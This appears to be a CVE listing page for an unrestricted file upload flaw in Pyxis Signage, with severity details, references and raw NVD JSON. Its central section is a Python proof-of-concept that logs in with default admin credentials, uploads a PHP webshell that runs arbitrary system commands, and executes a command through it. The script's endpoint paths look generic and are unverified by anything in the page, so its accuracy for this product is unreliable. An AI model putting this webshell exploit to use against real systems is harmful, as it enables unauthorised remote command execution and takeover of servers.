CVE-2025-0645

Description

Unrestricted Upload of File with Dangerous Type vulnerability in Narkom Communication and Software Technologies Trade Ltd. Co. Pyxis Signage allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Pyxis Signage: through 31012025.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Pyxis Signage <= 31012025

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-0645 PoC - Pyxis Signage Unrestricted File Upload
# Target: Pyxis Signage through 31012025

TARGET_URL = "http://target.com"  # Replace with target URL
LOGIN_URL = f"{TARGET_URL}/api/login"
UPLOAD_URL = f"{TARGET_URL}/api/upload"

# Malicious PHP webshell
webshell_content = "<?php if(isset($_REQUEST['cmd'])){ echo '<pre>'; $cmd = ($_REQUEST['cmd']); system($cmd); echo '</pre>'; } ?>"

def exploit():
    # Step 1: Authenticate with high privileges
    session = requests.Session()
    login_data = {
        "username": "admin",  # High privilege account
        "password": "password"
    }
    
    try:
        response = session.post(LOGIN_URL, json=login_data, timeout=10)
        if response.status_code != 200:
            print("[-] Authentication failed")
            return False
        print("[+] Authentication successful")
        
        # Step 2: Upload malicious file
        files = {
            "file": ("shell.php", webshell_content, "application/x-php")
        }
        
        upload_response = session.post(UPLOAD_URL, files=files, timeout=10)
        
        if upload_response.status_code == 200:
            print("[+] Malicious file uploaded successfully")
            # Step 3: Execute commands via webshell
            shell_url = f"{TARGET_URL}/uploads/shell.php"
            cmd_response = session.get(f"{shell_url}?cmd=whoami", timeout=10)
            if cmd_response.status_code == 200:
                print(f"[+] Remote Code Execution confirmed: {cmd_response.text}")
                return True
        else:
            print(f"[-] Upload failed: {upload_response.status_code}")
            return False
            
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False

if __name__ == "__main__":
    print("CVE-2025-0645 Pyxis Signage File Upload PoC")
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-0645
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-0645
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-0645/
[4] VulDB https://vuldb.com/cve/CVE-2025-0645
[5] https://www.usom.gov.tr/bildirim/tr-25-0404

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-0645", "sourceIdentifier": "[email protected]", "published": "2025-11-20T15:17:21.977", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unrestricted Upload of File with Dangerous Type vulnerability in Narkom Communication and Software Technologies Trade Ltd. Co. Pyxis Signage allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Pyxis Signage: through 31012025."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0404", "source": "[email protected]"}]}}